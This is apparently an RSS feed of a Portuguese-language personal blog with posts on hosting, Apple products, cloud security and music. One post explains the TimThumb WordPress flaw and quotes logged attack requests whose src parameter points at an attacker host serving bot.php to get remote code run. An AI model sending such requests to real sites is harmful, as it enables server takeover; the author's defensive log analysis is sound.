<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Blog do Eduardo Costa</title>
	<atom:link href="http://eduardo.costa.nom.br/feed/" rel="self" type="application/rss+xml" />
	<link>http://eduardo.costa.nom.br</link>
	<description>Meu blog pessoal</description>
	<lastBuildDate>Fri, 13 Jan 2012 22:52:59 +0000</lastBuildDate>
	<language>pt</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Spam flood</title>
		<link>http://eduardo.costa.nom.br/2012/01/13/spam-flood/</link>
		<comments>http://eduardo.costa.nom.br/2012/01/13/spam-flood/#comments</comments>
		<pubDate>Fri, 13 Jan 2012 22:52:59 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[serverfault]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=923</guid>
		<description><![CDATA[Por alguma razão que não conheço, meu blog foi inundado por spam. Tive que apagar 67 comentários desse tipo e agora fui obrigado a adotar o akismet. Talvez tenha sido eles, tentando vender o produto. O interessante é: nenhum dos comentários tinha links. O que me motivou a escrever foi ver no site do akismet [...]]]></description>
			<content:encoded><![CDATA[<p>Por alguma razão que não conheço, meu blog foi inundado por spam. Tive que apagar 67 comentários desse tipo e agora fui obrigado a adotar o akismet. Talvez tenha sido eles, tentando vender o produto. O interessante é: nenhum dos comentários tinha links. O que me motivou a escrever foi ver no site do akismet a informação que blog spammers contrata mão-de-obra barata para fazer o trabalho dos bots. Isso explica a criatividade dos textos. Ou seja, mais uma fonte de renda exploratória para quem não quer um trabalho de verdade!</p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2012/01/13/spam-flood/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Comandos MIDI no GarageBand</title>
		<link>http://eduardo.costa.nom.br/2012/01/01/comandos-midi-no-garageband/</link>
		<comments>http://eduardo.costa.nom.br/2012/01/01/comandos-midi-no-garageband/#comments</comments>
		<pubDate>Sun, 01 Jan 2012 14:05:18 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[geek]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=916</guid>
		<description><![CDATA[Brincando com meu LPD8 (e cogitando comprar um teclado para acompanhar), senti a necessidade de usar os controles MIDI. Infelizmente, o GarageBand não é muito configurável, então, por tentativa-e-erro, somado ao conteúdo de um site, descobri os seguintes códigos para os CCs (Controller Commands): CC 1 - Modulation (Tracker Editor) CC 4 - Foot Control (Tracker Editor) CC [...]]]></description>
			<content:encoded><![CDATA[<p>Brincando com meu LPD8 (e cogitando comprar um teclado para acompanhar), senti a necessidade de usar os controles MIDI. Infelizmente, o GarageBand não é muito configurável, então, por tentativa-e-erro, somado ao <a href="http://www.tweakheadz.com/midi_controllers.htm" target="_blank">conteúdo de um site</a>, descobri os seguintes códigos para os CCs (Controller Commands):</p>
<ul>
<li>CC 1 - Modulation (Tracker Editor)</li>
<li>CC 4 - Foot Control (Tracker Editor)</li>
<li>CC 7 - Track Volume</li>
<li>CC 10 - Track Pan</li>
<li>CC 11 - Expression (Tracker Editor)</li>
<li>CC 64 - Sustain On/Off (Tracker Editor)</li>
</ul>
<p>Estranhamente, não encontrei o Pitchband (Tracker Editor). Existe <a href="http://homepage.mac.com/rfwilmut/notes/GBcontrol.html" target="_blank">um site que menciona outros</a>, mas admito que não é dos mais fáceis de entender. A parte estranha é não ter uma documentação oficial da Apple sobre isso.</p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2012/01/01/comandos-midi-no-garageband/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Um ano de AWS</title>
		<link>http://eduardo.costa.nom.br/2011/12/28/um-ano-de-aws/</link>
		<comments>http://eduardo.costa.nom.br/2011/12/28/um-ano-de-aws/#comments</comments>
		<pubDate>Thu, 29 Dec 2011 01:13:31 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[geek]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=913</guid>
		<description><![CDATA[Ontem, dia 27, completou um ano em que a máquina do meu blog está no ar. Um ano sem bater cabeça com administrador mal-remunerado que nem sabe configurar permissões de pasta. Até hoje, por culpa da Amazon, o servidor só ficou fora do ar UMA vez. E, surpreendentemente, foi em uma manutenção programada com dias [...]]]></description>
			<content:encoded><![CDATA[<p>Ontem, dia 27, completou um ano em que a máquina do meu blog está no ar. Um ano sem bater cabeça com administrador mal-remunerado que nem sabe configurar permissões de pasta. Até hoje, por culpa da Amazon, o servidor só ficou fora do ar UMA vez. E, surpreendentemente, foi em uma manutenção programada com dias de antecedência. Esse reboot foi a 18 dias (e o servidor não foi reiniciado desde então).</p>
<p>Mesmo sendo a máquina mais fuleira na Amazon, ainda tem um poder de fogo de dar inveja a muita das hospedagens que já usei até hoje. Mesmo precisando tomar cuidado com as tentativas de invasão, ainda me sinto mais seguro.</p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/12/28/um-ano-de-aws/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>iTunes Store no Brasil</title>
		<link>http://eduardo.costa.nom.br/2011/12/14/itunes-store-no-brasil/</link>
		<comments>http://eduardo.costa.nom.br/2011/12/14/itunes-store-no-brasil/#comments</comments>
		<pubDate>Wed, 14 Dec 2011 13:10:50 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[geek]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=905</guid>
		<description><![CDATA[Estava eu com gripe, mal ficando em pé, filosofando se devo enfrentar novamente o ar condicionado do trabalho e me arriscar a piorar ainda mais ou se devia ficar em casa me recuperando com a sensação de culpa (sim, sou caxias). Ao abrir o Mail para remover o spam do dia e mandar um e-mail [...]]]></description>
			<content:encoded><![CDATA[<p>Estava eu com gripe, mal ficando em pé, filosofando se devo enfrentar novamente o ar condicionado do trabalho e me arriscar a piorar ainda mais ou se devia ficar em casa me recuperando com a sensação de culpa (sim, sou caxias). Ao abrir o Mail para remover o spam do dia e mandar um e-mail avisando de minha condição de saúde, deparei-me com uma mensagem da Apple com título curioso: "Apresentamos iTunes Store". Fiquei com uma sensação meio perdida. Ao abrir, entendi: iTunes Store, e não App Store!</p>
<p>Sim! Finalmente! Esse deve ter sido o preço que Steve Jobs estava pagando para entrar no céu: agora é possível comprar música e filmes no Brasil, sem a maluquice de compras estrangeiras! Aproveitei o iTunes sempre aberto (afinal, <a title="MacBook com 8GB de memória" href="http://eduardo.costa.nom.br/2011/11/30/macbook-com-8gb-de-memoria/">tenho 8GB de RAM</a>) para conferir. Saí da minha conta americana, fui para a conta brazuca e... Tchan tchan tchan tchaaaan! Aparecem Roberto Carlos e outros em uma aba "Músicas", ao lado de uma aba "Filmes". Comecei a gritar feito uma menininha que ganhou um pônei de natal.</p>
<p>Fui para os filmes. Tropa de Elite 2! Em HD! Mais um grito de menininha. Tá bem, vamos ver o preço. R$ 50, que nem a versão em DVD? Não!! Versão HD por R$ 20! Sim, vintão! Que tal então alugar? QUATRO REAIS. Sim, QUATRO em HD. Gasto mais que isso com metrô por dia (e a TV de lá não é HD)! Quatro reais para ficar um dia assistindo (e você ainda tem 30 dias para começar a assistir). Minha experiência alugando filmes na loja americana confirmou que alugar é melhor que comprar (matemática básica: preciso ver mais de cinco vezes para compensar a compra). Some isso ao fato que vai demorar para eu assistir denovo.</p>
<p>Que tal uma novidade? Smurfs. Eu não assistiria, mas acabou de sair dos cinemas. R$ 50 que nem o DVD? Não! R$ 15 em SD. Dublado para a garotada. Que tal algo mais cult? Lunar por R$ 10. Parece até que simplesmente traduziram US$ por R$, pois os valores são parecidos com os americanos.</p>
<p>Música. Quase esqueci. Seu Jorge em "Músicas para Churrasco": R$ 9 (ou R$ 1 por música). Evanescence em "Fallen", por R$ 6! Preço de camelô! Lançamento "Born This Way" da Lady Gaga por R$ 11 (cada música custa R$ 1). Eu já fui desses que baixava discografia inteira, e aprendi uma coisa: melhor gastar R$ 20 escolhendo vinte músicas boas do que R$ 300 num MP3 que agüente N gigabytes de músicas que nunca vou ouvir. Consegui colocar todas as músicas que comprei minha vida toda (e só comprei as que tinha certeza que ia escutar regularmente) em um iPod Shuffle de 2GB. Nunca consegui esse feito com meus MP3 xing-ling com 32GB e músicas piratas. Agora, nem preciso mais de contas em Londres, Argentina ou EUA. Adeus ilegalidade da pirataria.</p>
<p>Claro que nem tudo são flores. O sistema obviamente está começando, então tem muito filme só em SD, somente dublados, sem aluguel, etc. Considerando os valores, seria uma sacanagem reclamar deles agora.</p>
<p>EDIT: Descobri que aluguel de filmes agora são de 48 horas, no lugar de 24. Mereceu mais um grito "ponástico".</p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/12/14/itunes-store-no-brasil/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>MacBook com 8GB de memória</title>
		<link>http://eduardo.costa.nom.br/2011/11/30/macbook-com-8gb-de-memoria/</link>
		<comments>http://eduardo.costa.nom.br/2011/11/30/macbook-com-8gb-de-memoria/#comments</comments>
		<pubDate>Wed, 30 Nov 2011 23:18:01 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[geek]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=900</guid>
		<description><![CDATA[Eu sempre achei meu MacBook consideravelmente poderoso. Mesmo sendo um dual core, ele é incrivelmente rápido. O único defeito é a memória: 1.5GB (512MB para a placa de vídeo). Para quem usa o Mail e o Safari, é o suficiente. Para quem é como eu e usa NetBeans, Tomcat, Glassfish, XCode, iTunes, Pixelmator, GarageBand e [...]]]></description>
			<content:encoded><![CDATA[<p>Eu sempre achei meu MacBook consideravelmente poderoso. Mesmo sendo um dual core, ele é incrivelmente rápido. O único defeito é a memória: 1.5GB (512MB para a placa de vídeo). Para quem usa o Mail e o Safari, é o suficiente. Para quem é como eu e usa NetBeans, Tomcat, Glassfish, XCode, iTunes, Pixelmator, GarageBand e mais outros, não dá. Eu precisava fechar um para abrir o outro. Agora parece um computador para um developer:</p>
<p><a href="http://s.tpk.com.br/wp-content/uploads/2011/11/Screen-Shot-2011-11-30-at-20.36.41.png"><img class="aligncenter size-full wp-image-901" title="Screen Shot 2011-11-30 at 20.36.41" src="http://s.tpk.com.br/wp-content/uploads/2011/11/Screen-Shot-2011-11-30-at-20.36.41.png" alt="" width="313" height="388" /></a>Comprei um kit com dois módulos de 4GB da Crucial. Antes, pesquisei um pouco, claro. Essa marca é a "oficial" da Apple. Fiz o pedido direto com o fabricante. Sairia por míseros US$ 75, só que me ferrei no envio, pois a UPS (não confundir com USPS) fez tudo legalmente correto. O que significa que paguei imposto de importação e ICMS (circulação de mercadoria, baby). A facada ficou maior que o preço original. Até maior que o preço aqui no Brasil. Pelo menos, tenho o consolo de ser original, e não algum pirata. Quem não conhece alguém que comprou um Pen Drive Kingston de trocentos GB e descobriu que era um clone com 2GB?</p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/11/30/macbook-com-8gb-de-memoria/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Sweet Child of Mine</title>
		<link>http://eduardo.costa.nom.br/2011/11/21/sweet-child-of-mine/</link>
		<comments>http://eduardo.costa.nom.br/2011/11/21/sweet-child-of-mine/#comments</comments>
		<pubDate>Tue, 22 Nov 2011 01:18:39 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[sandbox]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=896</guid>
		<description><![CDATA[Na lista dos prodígios mirins, temos a pequena Zoe, de 7 anos, que sabe tocar Sweet Child o'Mine numa guitarra. Se não fosse pequenos deslizes de uma ou outra nota no filme inteiro (sim, ela toda a música completa), eu desacreditaria.]]></description>
			<content:encoded><![CDATA[<p>Na lista dos prodígios mirins, temos a pequena Zoe, de 7 anos, que sabe tocar Sweet Child o'Mine numa guitarra. Se não fosse pequenos deslizes de uma ou outra nota no filme inteiro (sim, ela toda a música completa), eu desacreditaria.</p>
<p><iframe width="550" height="309" src="http://www.youtube.com/embed/X4Kjtp4sA9E?fs=1&#038;feature=oembed" frameborder="0" allowfullscreen></iframe></p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/11/21/sweet-child-of-mine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>This is my story</title>
		<link>http://eduardo.costa.nom.br/2011/11/21/this-is-my-story/</link>
		<comments>http://eduardo.costa.nom.br/2011/11/21/this-is-my-story/#comments</comments>
		<pubDate>Tue, 22 Nov 2011 01:15:44 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[sandbox]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=893</guid>
		<description><![CDATA[Encontrei um site deveras criativo. A música inspiradora gera um clima interessante, mas tecnologicamente também é um show - consegue embutir bem a foto nas cenas. Acho que se a foto fosse melhor, o resultado ficaria mais suavemente encaixado. Mas, fora o problema de usuário com preguiça de arrumar foto melhor, é algo impressionante. Eis [...]]]></description>
			<content:encoded><![CDATA[<p>Encontrei um site deveras criativo. A música inspiradora gera um clima interessante, mas tecnologicamente também é um show - consegue embutir bem a foto nas cenas. Acho que se a foto fosse melhor, o resultado ficaria mais suavemente encaixado. Mas, fora o problema de usuário com preguiça de arrumar foto melhor, é algo impressionante.</p>
<p>Eis o link: <a href="http://www.this-is-my-story.com/v/7Y9E3WQDY649">http://www.this-is-my-story.com/v/7Y9E3WQDY649</a></p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/11/21/this-is-my-story/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Segurança na Nuvem</title>
		<link>http://eduardo.costa.nom.br/2011/11/09/seguranca-na-nuvem/</link>
		<comments>http://eduardo.costa.nom.br/2011/11/09/seguranca-na-nuvem/#comments</comments>
		<pubDate>Wed, 09 Nov 2011 23:40:07 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[cloud]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=886</guid>
		<description><![CDATA[Segurança na nuvem é um mito clássico. Vamos do básico: o que diferencia um serviço de cloud de um serviço de datacenter ou até uma solução "in-house"? Segundo os descrentes, ter uma equipe de infra e poder "tocar" fisicamente nos servidores é algo imprescindível. Mas, no fundo, é tudo igual. Veja o porquê nessa lista [...]]]></description>
			<content:encoded><![CDATA[<p>Segurança na nuvem é um mito clássico. Vamos do básico: o que diferencia um serviço de cloud de um serviço de datacenter ou até uma solução "in-house"? Segundo os descrentes, ter uma equipe de infra e poder "tocar" fisicamente nos servidores é algo imprescindível. Mas, no fundo, é tudo igual. Veja o porquê nessa lista de problemas clássicos:</p>
<ul>
<li>Perda de dados: muitos se borram de medo da nuvem, achando que é possível perder os dados. Alguém ouviu falar em backups? Pode ser um servidor na mesa do dono da empresa ou uma máquina virtualizada na Amazon. Se você não faz cópias de segurança, o risco de perder os dados é o mesmo. Se seu site está disponível em apenas uma máquina, sem nenhuma redundância (load balancing, cluster, etc), você tem apenas um ponto de falha - mais uma vez independente de onde sua máquina está.</li>
<li>Segurança: tem medo de alguém roubar seus dados? Persisto em dizer que uma máquina na nuvem é igual a qualquer outra - use criptografia e firewall. O <a href="http://www.jpl.nasa.gov/" target="_blank">Jet Propulsion Labs da NASA</a> tem toda uma massa de dados sensível, e tudo na Amazon. Colocaram criptografia onde precisava e até um software de firewall customizado para fazer VPN com clientes externos. E sua rede interna? Vai bem? Firewall bem configurado, NAT correta, dados críticos criptografados? E-mail com algum sistema anti-vírus? Acredite se quiser, mas já recebi vírus em e-mail corporativo - o que não acontece nos meus e-mails hospedados no Google Apps.</li>
<li>Confiabilidade do provedor: segue a mesma regra da perda de dados - backup, redundância, segurança, etc. Se tem medo do provedor cair, sumir ou roubar seus dados, por que escolheu ele, então? O mesmo que escolher um provedor web de R$ 5/mês: assumir o risco da empresa prestar um péssimo serviço, sumir com os dados ou até te infectar com vírus (já fui infectado em um provedor barato da época de pós-adolescente sem grana). Ou ainda, é o mesmo risco do estagiário mal-remunerado que cuida do servidor fazer um "format c:" ou queimar uma placa.</li>
</ul>
<div>Em resumo, note que esses mitos na computação em nuvem não são diferentes dos problemas que soluções "in-house" enfrentam. Meu blog está na nuvem e eu tenho as mesmas preocupações de segurança e afins que eu teria se estivesse na sala de casa ou num provedor web. Com a vantagem que não preciso me preocupar com a Eletropaulo faltando com a qualidade de serviço ou em sofrer na mão de suporte que configura mal o host e todos os clientes passam a ter acesso a tudo (sim, já aconteceu comigo - também na época "poor-guy").</div>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/11/09/seguranca-na-nuvem/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Memcached, Jira e mais tentativas de invasão</title>
		<link>http://eduardo.costa.nom.br/2011/11/08/memcached-jira-e-mais-tentativas-de-invasao/</link>
		<comments>http://eduardo.costa.nom.br/2011/11/08/memcached-jira-e-mais-tentativas-de-invasao/#comments</comments>
		<pubDate>Tue, 08 Nov 2011 22:46:24 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[serverfault]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=881</guid>
		<description><![CDATA[Vamos a boa notícia: como sobraram alguns megas na memória do servidor, instalei um memcached e, agora, o blog usa-o para fazer cache em memória. Nem preciso dizer que a carga do servidor foi lá em baixo. Ou seja, continuo com a máquina mais fuleira da Amazon (míseros 600mb de memória) e ainda consigo hospedar [...]]]></description>
			<content:encoded><![CDATA[<p>Vamos a boa notícia: como sobraram alguns megas na memória do servidor, instalei um <a href="http://memcached.org/">memcached</a> e, agora, o blog usa-o para fazer cache em memória. Nem preciso dizer que a carga do servidor foi lá em baixo. Ou seja, continuo com a máquina mais fuleira da Amazon (míseros 600mb de memória) e ainda consigo hospedar um site inteiro com boa performance. Claro que essa memória liberada foi graças a remoção dos serviços de e-mail (postfix e dovecot) - migrei tudo para o Google Apps.</p>
<p>Estou testando também o <a href="http://www.atlassian.com/software/jira/pricing.jsp">Jira On-Demand</a>. A intenção é substituir o horrível Mantis por algo mais útil e, de bônus, não precisar gerenciar mais um servidor. US$ 10 por mês seria o custo de uma instância <em>t1.micro </em>na Amazon, com a desvantagem que o Jira ajuda no bom nome do Java sendo absurdamente pesado, inviabilizando usar uma instância tão simples. Então, prefiro pagar US$ 10 em algo que eu não precise dar manutenção - com a vantagem que, se o Jira provar seu valor (tenho ainda um mês de trial), eu posso fazer uma assinatura anual e derrubar o custo para uns US$ 8 por mês! Com isso, meus projetos na Apple Store ganham uma URL mais profissional e amigável.</p>
<p>Como nem tudo são flores, fui dar uma entrada rápida na home do meu blog no trabalho para testar a velocidade em outra rede, quando, mais uma vez, estava tudo travado - algo estranho para um site que devia estar super-rápido. Na hora do almoço, entrei no servidor e descobri script-kiddies tentando invadir o sistema. Dessa vez foram dois de uma vez, e com o mesmo truque. Existe um tal de <a href="http://timthumb.googlecode.com/" target="_blank">TimThumb</a>, que contém uma verdadeira <a href="http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/" target="_blank">cratera de segurança</a>: ele aceita receber conteúdo externo vindo de sites como "youtube.com", "wordpress.com" e afins, mas não só aceita código <strong>executável</strong> (!!!), como também valida o remetente via "substring" (sim, aceita "wordpress.com.hostdail.com", por exemplo!!!!!).</p>
<p>Lindo, típico serviço de alguém que aprender a programar ontem. O divertido foi como descobriram a falha. O blog do criador do "plugin" foi invadido por uma broca em sua própria criação. Depois tem gente que pergunta por que não gosto de libs. Eu não uso esse traste, nem meu tema usa, mas hoje, novamente, meu servidor foi a 100% graças a dois idiotas que não sabem processar códigos de erro HTTP (<a title="Tentativa Lusitana de Invasão" href="http://eduardo.costa.nom.br/2011/10/07/tentativa-lusitana-de-invasao/" target="_blank">sim, novamente</a>). Olhando nos logs, descobri que o casal 1/20 tentava carregar os seguintes endereços:</p>
<ul>
<li>//wp-content/themes/boast/functions/_tbs.php?src=http://wordpress.com.hostdail.com/logs/logs.php</li>
<li>//wp-content/themes/boast/functions/timthumb.php?src=http://wordpress.com.hostdail.com/bot.ph</li>
<li>/category/geek//wp-content/themes/boast/functions/_tbs.php?src=http://wordpress.com.hostdail.com/<br />
bot.php</li>
</ul>
<p>Sim, com duas barras Deus-sabe-o-porquê, e um tema que não tenho instalado. Seria só mais uma tentativa frustrada se "Debi e Lóide" não ficassem tentando os mesmos endereços incessantemente. Detalhe: esses arquivos nem existem! Já criei uma categoria para o que faço de configuração em servidores - daqui a pouco, com tanta besteira que estou pegando, vou ter que criar um blog inteiro!</p>
<p>PS: Agora, virou os três patetas... O terceiro idiota acabou de tentar invadir. Pelo menos, esse tentou com mais de uma URL. Ele era britânico (server1.edjeavons.co.uk) e agora faz parte dos meus bloqueios do iptables.</p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/11/08/memcached-jira-e-mais-tentativas-de-invasao/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mais uma do Lomadee</title>
		<link>http://eduardo.costa.nom.br/2011/11/07/mais-uma-do-lomadee/</link>
		<comments>http://eduardo.costa.nom.br/2011/11/07/mais-uma-do-lomadee/#comments</comments>
		<pubDate>Tue, 08 Nov 2011 00:35:48 +0000</pubDate>
		<dc:creator>Eduardo Costa</dc:creator>
				<category><![CDATA[sandbox]]></category>

		<guid isPermaLink="false">http://eduardo.costa.nom.br/?p=878</guid>
		<description><![CDATA[Estava eu vendo as opções de lojas que tem no Lomadee, quando encontrei esta loja aqui: // Lomadee, uma nova espécie na web. A maior plataforma de afiliados da América Latina. Seria somente mais uma loja de eletrônicos e afins, mas descobri uma categoria chamada "bugingangas". Fiquei curioso e entrei. Encontrei algumas coisas bem nerds: [...]]]></description>
			<content:encoded><![CDATA[<p>Estava eu vendo as opções de lojas que tem no Lomadee, quando encontrei esta loja aqui:</p>
<p><!-- LOMADEE - BEGIN --></p>
<div style="width: 300px; height: 250px; overflow: hidden;"><script type="text/javascript">// <![CDATA[
lmd_source="23532143";lmd_si="33516114";lmd_pu="22485285";lmd_c="BR";lmd_wi="300";lmd_he="250";
// ]]&gt;</script><script src="http://image.lomadee.com/js/ad_lomadee.js" type="text/javascript"></script><a style="font-size: 10px;" href="http://www.lomadee.com/"></p>
<div>Lomadee, uma nova espécie na web. A maior plataforma de afiliados da América Latina.</div>
<p></a><a style="font-size: 10px;" href="http://www.lomadee.com/"></a></div>
<p><!-- LOMADEE - END --></p>
<p>Seria somente mais uma loja de eletrônicos e afins, mas descobri uma categoria chamada "<a href="http://links.lomadee.com/ls/NkJGeTtCbll0WUFHbzsyMzUzMjE2MTswOzE3NjszMzUxNjExNDswO0JSOzM7.html">bugingangas</a>". Fiquei curioso e entrei. Encontrei algumas coisas bem nerds:</p>
<ul>
<li><a href="http://links.lomadee.com/ls/VjAyZDtFbTkzczY0aDsyMzUzMjE2NzswOzE3NjszMzUxNjExNDswO0JSOzM7.html">Chaveiro Sabre-de-Luz</a> (baterias inclusas <img src='http://s.tpk.com.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  )</li>
<li><a href="http://links.lomadee.com/ls/bGlVOTtPMXlEUURzOTsyMzUzMjE3OTswOzE3NjszMzUxNjExNDswO0JSOzM7.html">Strap de Celular do Angry Birds</a></li>
<li><a href="http://links.lomadee.com/ls/eFJYfjszMVdjT0x6TTsyMzUzMjE4NTswOzE3NjszMzUxNjExNDswO0JSOzM7.html">Aquecedor de Café USB</a> (acho que vou comprar um para usar em casa)</li>
<li><a href="http://links.lomadee.com/ls/dFBxfjsyfnlkYVF6WDsyMzUzMjE4NzswOzE3NjszMzUxNjExNDswO0JSOzM7.html">Pião Magnético Levitador</a> (parece coisa do Think Geek)</li>
</ul>
<p>Tem mais umas coisas legais (que nem as camisas animadas), mas cansei de copiar e colar links... <img src='http://s.tpk.com.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://eduardo.costa.nom.br/2011/11/07/mais-uma-do-lomadee/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using memcached
Database Caching using memcached
Object Caching 739/865 objects using memcached
Content Delivery Network via Amazon Web Services: CloudFront: s.tpk.com.br

Served from: eduardo.costa.nom.br @ 2012-02-06 08:55:04 -->
